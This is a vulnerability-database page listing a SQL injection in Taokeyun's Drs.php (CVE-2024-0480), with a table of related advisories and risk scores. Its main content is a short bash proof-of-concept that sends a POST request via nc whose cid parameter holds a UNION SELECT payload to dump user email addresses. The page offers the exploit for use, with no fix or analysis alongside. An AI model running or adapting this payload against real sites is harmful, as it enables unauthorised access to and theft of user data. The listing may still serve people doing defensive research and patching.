Lucene search
K

Taokeyun SQL Injection Vulnerability

🗓️ 15 Jan 2024 00:00:00Reported by Amirhossein BahramizadehType 
zdt
 zdt
🔗 0day.today👁 292 Views

Taokeyun SQL Injection Vulnerability in Drs.php

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-0480
13 Jan 202409:26
circl
CNNVD
Taokeyun SQL Injection Vulnerability
13 Jan 202400:00
cnnvd
CVE
CVE-2024-0480
13 Jan 202407:31
cve
Cvelist
CVE-2024-0480 Taokeyun HTTP POST Request Drs.php index sql injection
13 Jan 202407:31
cvelist
EUVD
EUVD-2024-16275
3 Oct 202520:07
euvd
NVD
CVE-2024-0480
13 Jan 202408:15
nvd
Packet Storm
Taokeyun SQL Injection
15 Jan 202400:00
packetstorm
Prion
Sql injection
13 Jan 202408:15
prion
Positive Technologies
PT-2024-15597 · Taokeyun · Taokeyun
13 Jan 202400:00
ptsecurity
RedhatCVE
CVE-2024-0480
4 Feb 202522:59
redhatcve
Rows per page
#!/bin/bash

# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"

# Construct the request
request="POST $url HTTP/1.1\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: $((${#cid}+15))\r\n\r\n"
request+="$cid"

# Send the request
(echo -e "$request") | nc example.com 80

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jan 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.3 - 9.8
CVSS 27.5
EPSS0.00099
292